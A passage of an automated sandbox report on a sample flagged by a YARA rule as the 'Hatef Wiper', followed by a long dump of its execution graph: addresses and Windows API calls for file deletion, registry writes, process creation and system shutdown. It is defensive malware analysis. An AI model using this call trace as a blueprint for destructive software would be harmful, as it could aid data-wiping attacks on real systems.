                                                                      • Rule: JoeSecurity_HatefWiper, Description: Yara detected Hatef Wiper, Source: 0000000F.00000002.3703692097.0000000000702000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 0%, ReversingLabs
                                                                      • Detection: 0%, Virustotal, Browse
                                                                      Reputation:high
                                                                      Has exited:true


Execution Graph

Execution Coverage: 12.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 20.6%
Total number of Nodes: 1523
Total number of Limit Nodes: 37
[Execution graph: serialized node and edge listing from the interactive graph view (function addresses, called Windows APIs and call edges); the dump is truncated in this capture]
405e50 GetFileAttributesW CreateFileW 4825->4830 4827 402b10 4828 4030e3 4827->4828 4831 405f51 wsprintfW 4827->4831 4830->4827 4831->4828 4832 4029ff 4833 401553 19 API calls 4832->4833 4834 402a09 4833->4834 4835 40145c 18 API calls 4834->4835 4836 402a12 4835->4836 4837 402a1f RegQueryValueExW 4836->4837 4839 401a13 4836->4839 4838 402a3f 4837->4838 4842 402a45 4837->4842 4838->4842 4843 405f51 wsprintfW 4838->4843 4841 4029e4 RegCloseKey 4841->4839 4842->4839 4842->4841 4843->4842 4844 401000 4845 401037 BeginPaint GetClientRect 4844->4845 4846 40100c DefWindowProcW 4844->4846 4848 4010fc 4845->4848 4849 401182 4846->4849 4850 401073 CreateBrushIndirect FillRect DeleteObject 4848->4850 4851 401105 4848->4851 4850->4848 4852 401170 EndPaint 4851->4852 4853 40110b CreateFontIndirectW 4851->4853 4852->4849 4853->4852 4854 40111b 6 API calls 4853->4854 4854->4852 4855 401f80 4856 401446 18 API calls 4855->4856 4857 401f88 4856->4857 4858 401446 18 API calls 4857->4858 4859 401f93 4858->4859 4860 401fa3 4859->4860 4861 40145c 18 API calls 4859->4861 4862 401fb3 4860->4862 4863 40145c 18 API calls 4860->4863 4861->4860 4864 402006 4862->4864 4865 401fbc 4862->4865 4863->4862 4867 40145c 18 API calls 4864->4867 4866 401446 18 API calls 4865->4866 4869 401fc4 4866->4869 4868 40200d 4867->4868 4870 40145c 18 API calls 4868->4870 4871 401446 18 API calls 4869->4871 4872 402016 FindWindowExW 4870->4872 4873 401fce 4871->4873 4877 402036 4872->4877 4874 401ff6 SendMessageW 4873->4874 4875 401fd8 SendMessageTimeoutW 4873->4875 4874->4877 4875->4877 4876 4030e3 4877->4876 4879 405f51 wsprintfW 4877->4879 4879->4876 4880 402880 4881 402884 4880->4881 4882 40145c 18 API calls 4881->4882 4883 4028a7 4882->4883 4884 40145c 18 API calls 4883->4884 4885 4028b1 4884->4885 4886 4028ba RegCreateKeyExW 4885->4886 4887 4028e8 4886->4887 4894 4029ef 4886->4894 4888 402934 4887->4888 4889 40145c 18 API calls 4887->4889 4890 402963 4888->4890 4893 401446 18 API calls 4888->4893 4892 
4028fc lstrlenW 4889->4892 4891 4029ae RegSetValueExW 4890->4891 4895 40337f 37 API calls 4890->4895 4898 4029c6 RegCloseKey 4891->4898 4899 4029cb 4891->4899 4896 402918 4892->4896 4897 40292a 4892->4897 4900 402947 4893->4900 4901 40297b 4895->4901 4902 4062a3 11 API calls 4896->4902 4903 4062a3 11 API calls 4897->4903 4898->4894 4904 4062a3 11 API calls 4899->4904 4905 4062a3 11 API calls 4900->4905 4911 406224 4901->4911 4907 402922 4902->4907 4903->4888 4904->4898 4905->4890 4907->4891 4910 4062a3 11 API calls 4910->4907 4912 406247 4911->4912 4913 40628a 4912->4913 4914 40625c wsprintfW 4912->4914 4915 402991 4913->4915 4916 406293 lstrcatW 4913->4916 4914->4913 4914->4914 4915->4910 4916->4915 4917 402082 4918 401446 18 API calls 4917->4918 4919 402093 SetWindowLongW 4918->4919 4920 4030e3 4919->4920 3462 403883 #17 SetErrorMode OleInitialize 3536 4062fc GetModuleHandleA 3462->3536 3466 4038f1 GetCommandLineW 3541 406009 lstrcpynW 3466->3541 3468 403903 GetModuleHandleW 3469 40391b 3468->3469 3542 405d06 3469->3542 3472 4039d6 3473 4039f5 GetTempPathW 3472->3473 3546 4037cc 3473->3546 3475 403a0b 3476 403a33 DeleteFileW 3475->3476 3477 403a0f GetWindowsDirectoryW lstrcatW 3475->3477 3554 403587 GetTickCount GetModuleFileNameW 3476->3554 3479 4037cc 11 API calls 3477->3479 3478 405d06 CharNextW 3485 40393c 3478->3485 3481 403a2b 3479->3481 3481->3476 3483 403acc 3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3640 403859 3483->3640 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3491 403ae1 3647 405ca0 3491->3647 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3651 406009 lstrcpynW 3493->3651 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3652 40677e 3503->3652 3507 403be6 3504->3507 3509 403b36 3506->3509 
3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3682 406009 lstrcpynW 3509->3682 3681 406009 lstrcpynW 3510->3681 3515 403bef 3511->3515 3514 403b44 3683 406009 lstrcpynW 3514->3683 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3667 406009 lstrcpynW 3519->3667 3711 40141d 3520->3711 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3684 406805 3529->3684 3703 406c68 3529->3703 3708 405c3f CreateProcessW 3529->3708 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3714 406038 3546->3714 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3723 406722 lstrlenW CharPrevW 3549->3723 3730 405e50 GetFileAttributesW CreateFileW 3554->3730 3556 4035c7 3577 4035d7 3556->3577 3731 406009 lstrcpynW 3556->3731 3558 4035ed 3732 406751 lstrlenW 3558->3732 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3739 4032d2 3563->3739 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3773 403368 SetFilePointer 3565->3773 3750 403368 SetFilePointer 3567->3750 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3751 40337f 3571->3751 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3737 403336 ReadFile 3576->3737 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 
405958 3584->3586 3806 405f51 wsprintfW 3585->3806 3807 405ed3 RegOpenKeyExW 3586->3807 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3797 403e95 3592->3797 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3813 403e74 3602->3813 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3614 403ac1 3605->3614 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3617 406722 3 API calls 3608->3617 3609->3608 3615 405a4d GetFileAttributesW 3609->3615 3611->3606 3618 405b6c 3612->3618 3619 405a2a 3613->3619 3668 4060e7 3614->3668 3620 405a59 3615->3620 3616 405a9c 3616->3604 3621 405a69 3617->3621 3618->3614 3624 403e95 19 API calls 3618->3624 3619->3607 3620->3608 3622 406751 2 API calls 3620->3622 3812 406009 lstrcpynW 3621->3812 3622->3608 3625 405b7d 3624->3625 3626 405b89 ShowWindow LoadLibraryW 3625->3626 3627 405c0c 3625->3627 3629 405ba8 LoadLibraryW 3626->3629 3630 405baf GetClassInfoW 3626->3630 3818 405047 OleInitialize 3627->3818 3629->3630 3631 405bc3 GetClassInfoW RegisterClassW 3630->3631 3632 405bd9 DialogBoxParamW 3630->3632 3631->3632 3634 40141d 80 API calls 3632->3634 3633 405c12 3635 405c16 3633->3635 3636 405c2e 3633->3636 3637 405c01 3634->3637 3635->3614 3639 40141d 80 API calls 3635->3639 3638 40141d 80 API calls 3636->3638 3637->3614 3638->3614 3639->3614 3641 403871 3640->3641 3642 403863 CloseHandle 3640->3642 3966 403c83 3641->3966 3642->3641 3648 405cb5 3647->3648 3649 403aef ExitProcess 3648->3649 3650 405ccb MessageBoxIndirectW 3648->3650 3650->3649 3651->3473 4023 406009 lstrcpynW 3652->4023 
3654 40678f 3655 405d59 4 API calls 3654->3655 3656 406795 3655->3656 3657 406038 5 API calls 3656->3657 3664 403a97 3656->3664 3663 4067a5 3657->3663 3658 4067dd lstrlenW 3659 4067e4 3658->3659 3658->3663 3660 406722 3 API calls 3659->3660 3662 4067ea GetFileAttributesW 3660->3662 3661 4062d5 2 API calls 3661->3663 3662->3664 3663->3658 3663->3661 3663->3664 3665 406751 2 API calls 3663->3665 3664->3483 3666 406009 lstrcpynW 3664->3666 3665->3658 3666->3519 3667->3486 3669 406110 3668->3669 3670 4060f3 3668->3670 3672 406187 3669->3672 3673 40612d 3669->3673 3676 406104 3669->3676 3671 4060fd CloseHandle 3670->3671 3670->3676 3671->3676 3674 406190 lstrcatW lstrlenW WriteFile 3672->3674 3672->3676 3673->3674 3675 406136 GetFileAttributesW 3673->3675 3674->3676 4024 405e50 GetFileAttributesW CreateFileW 3675->4024 3676->3483 3678 406152 3678->3676 3679 406162 WriteFile 3678->3679 3680 40617c SetFilePointer 3678->3680 3679->3680 3680->3672 3681->3509 3682->3514 3683->3529 3697 406812 3684->3697 3685 406a7f 3686 403b6c DeleteFileW 3685->3686 4027 406009 lstrcpynW 3685->4027 3686->3527 3686->3529 3688 4068d3 GetVersion 3700 4068e0 3688->3700 3689 406a46 lstrlenW 3689->3697 3690 406805 10 API calls 3690->3689 3693 405ed3 3 API calls 3693->3700 3694 406952 GetSystemDirectoryW 3694->3700 3695 406965 GetWindowsDirectoryW 3695->3700 3696 406038 5 API calls 3696->3697 3697->3685 3697->3688 3697->3689 3697->3690 3697->3696 4025 405f51 wsprintfW 3697->4025 4026 406009 lstrcpynW 3697->4026 3698 406805 10 API calls 3698->3700 3699 4069df lstrcatW 3699->3697 3700->3693 3700->3694 3700->3695 3700->3697 3700->3698 3700->3699 3701 406999 SHGetSpecialFolderLocation 3700->3701 3701->3700 3702 4069b1 SHGetPathFromIDListW CoTaskMemFree 3701->3702 3702->3700 3704 4062fc 3 API calls 3703->3704 3705 406c6f 3704->3705 3707 406c90 3705->3707 4028 406a99 lstrcpyW 3705->4028 3707->3529 3709 405c7a 3708->3709 3710 405c6e CloseHandle 3708->3710 3709->3529 3710->3709 3712 40139d 80 API calls 
3711->3712 3713 401432 3712->3713 3713->3495 3720 406045 3714->3720 3715 4060bb 3716 4060c1 CharPrevW 3715->3716 3718 4060e1 3715->3718 3716->3715 3717 4060ae CharNextW 3717->3715 3717->3720 3718->3549 3719 405d06 CharNextW 3719->3720 3720->3715 3720->3717 3720->3719 3721 40609a CharNextW 3720->3721 3722 4060a9 CharNextW 3720->3722 3721->3720 3722->3717 3724 4037ea CreateDirectoryW 3723->3724 3725 40673f lstrcatW 3723->3725 3726 405e7f 3724->3726 3725->3724 3727 405e8c GetTickCount GetTempFileNameW 3726->3727 3728 405ec2 3727->3728 3729 4037fe 3727->3729 3728->3727 3728->3729 3729->3475 3730->3556 3731->3558 3733 406760 3732->3733 3734 4035f3 3733->3734 3735 406766 CharPrevW 3733->3735 3736 406009 lstrcpynW 3734->3736 3735->3733 3735->3734 3736->3562 3738 403357 3737->3738 3738->3576 3740 4032f3 3739->3740 3741 4032db 3739->3741 3744 403303 GetTickCount 3740->3744 3745 4032fb 3740->3745 3742 4032e4 DestroyWindow 3741->3742 3743 4032eb 3741->3743 3742->3743 3743->3565 3747 403311 CreateDialogParamW ShowWindow 3744->3747 3748 403334 3744->3748 3774 406332 3745->3774 3747->3748 3748->3565 3750->3571 3753 403398 3751->3753 3752 4033c3 3755 403336 ReadFile 3752->3755 3753->3752 3785 403368 SetFilePointer 3753->3785 3756 4033ce 3755->3756 3757 4033e7 GetTickCount 3756->3757 3758 403518 3756->3758 3760 4033d2 3756->3760 3770 4033fa 3757->3770 3759 40351c 3758->3759 3764 403540 3758->3764 3761 403336 ReadFile 3759->3761 3760->3580 3761->3760 3762 403336 ReadFile 3762->3764 3763 403336 ReadFile 3763->3770 3764->3760 3764->3762 3765 40355f WriteFile 3764->3765 3765->3760 3766 403574 3765->3766 3766->3760 3766->3764 3768 40345c GetTickCount 3768->3770 3769 403485 MulDiv wsprintfW 3786 404f72 3769->3786 3770->3760 3770->3763 3770->3768 3770->3769 3772 4034c9 WriteFile 3770->3772 3778 407312 3770->3778 3772->3760 3772->3770 3773->3572 3775 40634f PeekMessageW 3774->3775 3776 406345 DispatchMessageW 3775->3776 3777 403301 3775->3777 3776->3775 3777->3565 3779 407332 3778->3779 
3780 40733a 3778->3780 3779->3770 3780->3779 3781 4073c2 GlobalFree 3780->3781 3782 4073cb GlobalAlloc 3780->3782 3783 407443 GlobalAlloc 3780->3783 3784 40743a GlobalFree 3780->3784 3781->3782 3782->3779 3782->3780 3783->3779 3783->3780 3784->3783 3785->3752 3787 404f8b 3786->3787 3796 40502f 3786->3796 3788 404fa9 lstrlenW 3787->3788 3789 406805 18 API calls 3787->3789 3790 404fd2 3788->3790 3791 404fb7 lstrlenW 3788->3791 3789->3788 3793 404fe5 3790->3793 3794 404fd8 SetWindowTextW 3790->3794 3792 404fc9 lstrcatW 3791->3792 3791->3796 3792->3790 3795 404feb SendMessageW SendMessageW SendMessageW 3793->3795 3793->3796 3794->3793 3795->3796 3796->3770 3798 403ea9 3797->3798 3826 405f51 wsprintfW 3798->3826 3800 403f1d 3801 406805 18 API calls 3800->3801 3802 403f29 SetWindowTextW 3801->3802 3804 403f44 3802->3804 3803 403f5f 3803->3595 3804->3803 3805 406805 18 API calls 3804->3805 3805->3804 3806->3592 3808 405f07 RegQueryValueExW 3807->3808 3809 405989 3807->3809 3810 405f29 RegCloseKey 3808->3810 3809->3590 3809->3591 3810->3809 3812->3597 3827 406009 lstrcpynW 3813->3827 3815 403e88 3816 406722 3 API calls 3815->3816 3817 403e8e lstrcatW 3816->3817 3817->3616 3828 403daf 3818->3828 3820 40506a 3823 4062a3 11 API calls 3820->3823 3825 405095 3820->3825 3831 40139d 3820->3831 3821 403daf SendMessageW 3822 4050a5 OleUninitialize 3821->3822 3822->3633 3823->3820 3825->3821 3826->3800 3827->3815 3829 403dc7 3828->3829 3830 403db8 SendMessageW 3828->3830 3829->3820 3830->3829 3834 4013a4 3831->3834 3832 401410 3832->3820 3834->3832 3835 4013dd MulDiv SendMessageW 3834->3835 3836 4015a0 3834->3836 3835->3834 3837 4015fa 3836->3837 3916 40160c 3836->3916 3838 401601 3837->3838 3839 401742 3837->3839 3840 401962 3837->3840 3841 4019ca 3837->3841 3842 40176e 3837->3842 3843 401650 3837->3843 3844 4017b1 3837->3844 3845 401672 3837->3845 3846 401693 3837->3846 3847 401616 3837->3847 3848 4016d6 3837->3848 3849 401736 3837->3849 3850 401897 3837->3850 3851 4018db 
3837->3851 3852 40163c 3837->3852 3853 4016bd 3837->3853 3837->3916 3866 4062a3 11 API calls 3838->3866 3858 401751 ShowWindow 3839->3858 3859 401758 3839->3859 3863 40145c 18 API calls 3840->3863 3856 40145c 18 API calls 3841->3856 3860 40145c 18 API calls 3842->3860 3943 4062a3 lstrlenW wvsprintfW 3843->3943 3949 40145c 3844->3949 3861 40145c 18 API calls 3845->3861 3946 401446 3846->3946 3855 40145c 18 API calls 3847->3855 3872 401446 18 API calls 3848->3872 3848->3916 3849->3916 3965 405f51 wsprintfW 3849->3965 3862 40145c 18 API calls 3850->3862 3867 40145c 18 API calls 3851->3867 3857 401647 PostQuitMessage 3852->3857 3852->3916 3854 4062a3 11 API calls 3853->3854 3869 4016c7 SetForegroundWindow 3854->3869 3870 40161c 3855->3870 3871 4019d1 SearchPathW 3856->3871 3857->3916 3858->3859 3873 401765 ShowWindow 3859->3873 3859->3916 3874 401775 3860->3874 3875 401678 3861->3875 3876 40189d 3862->3876 3877 401968 GetFullPathNameW 3863->3877 3866->3916 3868 4018e2 3867->3868 3880 40145c 18 API calls 3868->3880 3869->3916 3881 4062a3 11 API calls 3870->3881 3871->3916 3872->3916 3873->3916 3884 4062a3 11 API calls 3874->3884 3885 4062a3 11 API calls 3875->3885 3961 4062d5 FindFirstFileW 3876->3961 3887 40197f 3877->3887 3929 4019a1 3877->3929 3879 40169a 3889 4062a3 11 API calls 3879->3889 3890 4018eb 3880->3890 3891 401627 3881->3891 3893 401785 SetFileAttributesW 3884->3893 3894 401683 3885->3894 3911 4062d5 2 API calls 3887->3911 3887->3929 3888 4062a3 11 API calls 3896 4017c9 3888->3896 3897 4016a7 Sleep 3889->3897 3899 40145c 18 API calls 3890->3899 3900 404f72 25 API calls 3891->3900 3902 40179a 3893->3902 3893->3916 3909 404f72 25 API calls 3894->3909 3954 405d59 CharNextW CharNextW 3896->3954 3897->3916 3898 4019b8 GetShortPathNameW 3898->3916 3907 4018f5 3899->3907 3900->3916 3901 40139d 65 API calls 3901->3916 3908 4062a3 11 API calls 3902->3908 3903 4018c2 3912 4062a3 11 API calls 3903->3912 3904 4018a9 3910 4062a3 11 API calls 3904->3910 3914 4062a3 11 
API calls 3907->3914 3908->3916 3909->3916 3910->3916 3915 401991 3911->3915 3912->3916 3913 4017d4 3917 401864 3913->3917 3920 405d06 CharNextW 3913->3920 3938 4062a3 11 API calls 3913->3938 3918 401902 MoveFileW 3914->3918 3915->3929 3964 406009 lstrcpynW 3915->3964 3916->3834 3917->3894 3919 40186e 3917->3919 3921 401912 3918->3921 3922 40191e 3918->3922 3923 404f72 25 API calls 3919->3923 3925 4017e6 CreateDirectoryW 3920->3925 3921->3894 3927 401942 3922->3927 3932 4062d5 2 API calls 3922->3932 3928 401875 3923->3928 3925->3913 3926 4017fe GetLastError 3925->3926 3930 401827 GetFileAttributesW 3926->3930 3931 40180b GetLastError 3926->3931 3937 4062a3 11 API calls 3927->3937 3960 406009 lstrcpynW 3928->3960 3929->3898 3929->3916 3930->3913 3934 4062a3 11 API calls 3931->3934 3935 401929 3932->3935 3934->3913 3935->3927 3940 406c68 42 API calls 3935->3940 3936 401882 SetCurrentDirectoryW 3936->3916 3939 40195c 3937->3939 3938->3913 3939->3916 3941 401936 3940->3941 3942 404f72 25 API calls 3941->3942 3942->3927 3944 4060e7 9 API calls 3943->3944 3945 401664 3944->3945 3945->3901 3947 406805 18 API calls 3946->3947 3948 401455 3947->3948 3948->3879 3950 406805 18 API calls 3949->3950 3951 401488 3950->3951 3952 401497 3951->3952 3953 406038 5 API calls 3951->3953 3952->3888 3953->3952 3955 405d76 3954->3955 3956 405d88 3954->3956 3955->3956 3957 405d83 CharNextW 3955->3957 3958 405dac 3956->3958 3959 405d06 CharNextW 3956->3959 3957->3958 3958->3913 3959->3956 3960->3936 3962 4018a5 3961->3962 3963 4062eb FindClose 3961->3963 3962->3903 3962->3904 3963->3962 3964->3929 3965->3916 3967 403c91 3966->3967 3968 403876 3967->3968 3969 403c96 FreeLibrary GlobalFree 3967->3969 3970 406c9b 3968->3970 3969->3968 3969->3969 3971 40677e 18 API calls 3970->3971 3972 406cae 3971->3972 3973 406cb7 DeleteFileW 3972->3973 3974 406cce 3972->3974 4014 403882 OleUninitialize 3973->4014 3975 406e4b 3974->3975 4018 406009 lstrcpynW 3974->4018 3981 4062d5 2 API calls 3975->3981 4003 
406e58 3975->4003 3975->4014 3977 406cf9 3978 406d03 lstrcatW 3977->3978 3979 406d0d 3977->3979 3980 406d13 3978->3980 3982 406751 2 API calls 3979->3982 3984 406d23 lstrcatW 3980->3984 3985 406d19 3980->3985 3983 406e64 3981->3983 3982->3980 3988 406722 3 API calls 3983->3988 3983->4014 3987 406d2b lstrlenW FindFirstFileW 3984->3987 3985->3984 3985->3987 3986 4062a3 11 API calls 3986->4014 3989 406e3b 3987->3989 3993 406d52 3987->3993 3990 406e6e 3988->3990 3989->3975 3992 4062a3 11 API calls 3990->3992 3991 405d06 CharNextW 3991->3993 3994 406e79 3992->3994 3993->3991 3997 406e18 FindNextFileW 3993->3997 4006 406c9b 72 API calls 3993->4006 4013 404f72 25 API calls 3993->4013 4015 4062a3 11 API calls 3993->4015 4016 404f72 25 API calls 3993->4016 4017 406c68 42 API calls 3993->4017 4019 406009 lstrcpynW 3993->4019 4020 405e30 GetFileAttributesW 3993->4020 3995 405e30 2 API calls 3994->3995 3996 406e81 RemoveDirectoryW 3995->3996 4000 406ec4 3996->4000 4001 406e8d 3996->4001 3997->3993 3999 406e30 FindClose 3997->3999 3999->3989 4002 404f72 25 API calls 4000->4002 4001->4003 4004 406e93 4001->4004 4002->4014 4003->3986 4005 4062a3 11 API calls 4004->4005 4007 406e9d 4005->4007 4006->3993 4009 404f72 25 API calls 4007->4009 4011 406ea7 4009->4011 4012 406c68 42 API calls 4011->4012 4012->4014 4013->3997 4014->3491 4014->3492 4015->3993 4016->3993 4017->3993 4018->3977 4019->3993 4021 405e4d DeleteFileW 4020->4021 4022 405e3f SetFileAttributesW 4020->4022 4021->3993 4022->4021 4023->3654 4024->3678 4025->3697 4026->3697 4027->3686 4029 406ae7 GetShortPathNameW 4028->4029 4030 406abe 4028->4030 4031 406b00 4029->4031 4032 406c62 4029->4032 4054 405e50 GetFileAttributesW CreateFileW 4030->4054 4031->4032 4034 406b08 WideCharToMultiByte 4031->4034 4032->3707 4034->4032 4036 406b25 WideCharToMultiByte 4034->4036 4035 406ac7 CloseHandle GetShortPathNameW 4035->4032 4037 406adf 4035->4037 4036->4032 4038 406b3d wsprintfA 4036->4038 4037->4029 4037->4032 4039 406805 18 API 
calls 4038->4039 4040 406b69 4039->4040 4055 405e50 GetFileAttributesW CreateFileW 4040->4055 4042 406b76 4042->4032 4043 406b83 GetFileSize GlobalAlloc 4042->4043 4044 406ba4 ReadFile 4043->4044 4045 406c58 CloseHandle 4043->4045 4044->4045 4046 406bbe 4044->4046 4045->4032 4046->4045 4056 405db6 lstrlenA 4046->4056 4049 406bd7 lstrcpyA 4052 406bf9 4049->4052 4050 406beb 4051 405db6 4 API calls 4050->4051 4051->4052 4053 406c30 SetFilePointer WriteFile GlobalFree 4052->4053 4053->4045 4054->4035 4055->4042 4057 405df7 lstrlenA 4056->4057 4058 405dd0 lstrcmpiA 4057->4058 4059 405dff 4057->4059 4058->4059 4060 405dee CharNextA 4058->4060 4059->4049 4059->4050 4060->4057 4921 402a84 4922 401553 19 API calls 4921->4922 4923 402a8e 4922->4923 4924 401446 18 API calls 4923->4924 4925 402a98 4924->4925 4926 401a13 4925->4926 4927 402ab2 RegEnumKeyW 4925->4927 4928 402abe RegEnumValueW 4925->4928 4929 402a7e 4927->4929 4928->4926 4928->4929 4929->4926 4930 4029e4 RegCloseKey 4929->4930 4930->4926 4931 402c8a 4932 402ca2 4931->4932 4933 402c8f 4931->4933 4935 40145c 18 API calls 4932->4935 4934 401446 18 API calls 4933->4934 4937 402c97 4934->4937 4936 402ca9 lstrlenW 4935->4936 4936->4937 4938 402ccb WriteFile 4937->4938 4939 401a13 4937->4939 4938->4939 4940 40400d 4941 40406a 4940->4941 4942 40401a lstrcpynA lstrlenA 4940->4942 4942->4941 4943 40404b 4942->4943 4943->4941 4944 404057 GlobalFree 4943->4944 4944->4941 4945 401d8e 4946 40145c 18 API calls 4945->4946 4947 401d95 ExpandEnvironmentStringsW 4946->4947 4948 401da8 4947->4948 4950 401db9 4947->4950 4949 401dad lstrcmpW 4948->4949 4948->4950 4949->4950 4951 401e0f 4952 401446 18 API calls 4951->4952 4953 401e17 4952->4953 4954 401446 18 API calls 4953->4954 4955 401e21 4954->4955 4956 4030e3 4955->4956 4958 405f51 wsprintfW 4955->4958 4958->4956 4959 402392 4960 40145c 18 API calls 4959->4960 4961 402399 4960->4961 4964 4071f8 4961->4964 4965 406ed2 25 API calls 4964->4965 4966 407218 4965->4966 4967 407222 
lstrcpynW lstrcmpW 4966->4967 4968 4023a7 4966->4968 4969 407254 4967->4969 4970 40725a lstrcpynW 4967->4970 4969->4970 4970->4968 4971 402713 4986 406009 lstrcpynW 4971->4986 4973 40272c 4987 406009 lstrcpynW 4973->4987 4975 402738 4976 40145c 18 API calls 4975->4976 4978 402743 4975->4978 4976->4978 4977 402752 4980 40145c 18 API calls 4977->4980 4982 402761 4977->4982 4978->4977 4979 40145c 18 API calls 4978->4979 4979->4977 4980->4982 4981 40145c 18 API calls 4983 40276b 4981->4983 4982->4981 4984 4062a3 11 API calls 4983->4984 4985 40277f WritePrivateProfileStringW 4984->4985 4986->4973 4987->4975 4988 402797 4989 40145c 18 API calls 4988->4989 4990 4027ae 4989->4990 4991 40145c 18 API calls 4990->4991 4992 4027b7 4991->4992 4993 40145c 18 API calls 4992->4993 4994 4027c0 GetPrivateProfileStringW lstrcmpW 4993->4994 4995 402e18 4996 40145c 18 API calls 4995->4996 4997 402e1f FindFirstFileW 4996->4997 4998 402e32 4997->4998 5003 405f51 wsprintfW 4998->5003 5000 402e43 5004 406009 lstrcpynW 5000->5004 5002 402e50 5003->5000 5004->5002 5005 401e9a 5006 40145c 18 API calls 5005->5006 5007 401ea1 5006->5007 5008 401446 18 API calls 5007->5008 5009 401eab wsprintfW 5008->5009 4110 401a1f 4111 40145c 18 API calls 4110->4111 4112 401a26 4111->4112 4113 4062a3 11 API calls 4112->4113 4114 401a49 4113->4114 4115 401a64 4114->4115 4116 401a5c 4114->4116 4164 406009 lstrcpynW 4115->4164 4163 406009 lstrcpynW 4116->4163 4119 401a62 4123 406038 5 API calls 4119->4123 4120 401a6f 4121 406722 3 API calls 4120->4121 4122 401a75 lstrcatW 4121->4122 4122->4119 4125 401a81 4123->4125 4124 4062d5 2 API calls 4124->4125 4125->4124 4126 405e30 2 API calls 4125->4126 4128 401a98 CompareFileTime 4125->4128 4129 401ba9 4125->4129 4133 4062a3 11 API calls 4125->4133 4137 406009 lstrcpynW 4125->4137 4143 406805 18 API calls 4125->4143 4150 405ca0 MessageBoxIndirectW 4125->4150 4154 401b50 4125->4154 4161 401b5d 4125->4161 4162 405e50 GetFileAttributesW CreateFileW 4125->4162 4126->4125 
4128->4125 4130 404f72 25 API calls 4129->4130 4132 401bb3 4130->4132 4131 404f72 25 API calls 4134 401b70 4131->4134 4135 40337f 37 API calls 4132->4135 4133->4125 4138 4062a3 11 API calls 4134->4138 4136 401bc6 4135->4136 4139 4062a3 11 API calls 4136->4139 4137->4125 4145 401b8b 4138->4145 4140 401bda 4139->4140 4141 401be9 SetFileTime 4140->4141 4142 401bf8 FindCloseChangeNotification 4140->4142 4141->4142 4144 401c09 4142->4144 4142->4145 4143->4125 4146 401c21 4144->4146 4147 401c0e 4144->4147 4149 406805 18 API calls 4146->4149 4148 406805 18 API calls 4147->4148 4151 401c16 lstrcatW 4148->4151 4152 401c29 4149->4152 4150->4125 4151->4152 4153 4062a3 11 API calls 4152->4153 4155 401c34 4153->4155 4156 401b93 4154->4156 4157 401b53 4154->4157 4158 405ca0 MessageBoxIndirectW 4155->4158 4159 4062a3 11 API calls 4156->4159 4160 4062a3 11 API calls 4157->4160 4158->4145 4159->4145 4160->4161 4161->4131 4162->4125 4163->4119 4164->4120 5010 40209f GetDlgItem GetClientRect 5011 40145c 18 API calls 5010->5011 5012 4020cf LoadImageW SendMessageW 5011->5012 5013 4030e3 5012->5013 5014 4020ed DeleteObject 5012->5014 5014->5013 5015 402b9f 5016 401446 18 API calls 5015->5016 5021 402ba7 5016->5021 5017 402c4a 5018 402bdf ReadFile 5020 402c3d 5018->5020 5018->5021 5019 401446 18 API calls 5019->5020 5020->5017 5020->5019 5027 402d17 ReadFile 5020->5027 5021->5017 5021->5018 5021->5020 5022 402c06 MultiByteToWideChar 5021->5022 5023 402c3f 5021->5023 5025 402c4f 5021->5025 5022->5021 5022->5025 5028 405f51 wsprintfW 5023->5028 5025->5020 5026 402c6b SetFilePointer 5025->5026 5026->5020 5027->5020 5028->5017 5029 402b23 GlobalAlloc 5030 402b39 5029->5030 5031 402b4b 5029->5031 5032 401446 18 API calls 5030->5032 5033 40145c 18 API calls 5031->5033 5034 402b41 5032->5034 5035 402b52 WideCharToMultiByte lstrlenA 5033->5035 5036 402b93 5034->5036 5037 402b84 WriteFile 5034->5037 5035->5034 5037->5036 5038 402384 GlobalFree 5037->5038 5038->5036 5040 4044a5 5041 404512 

                                                                        Control-flow Graph

                                                                        APIs
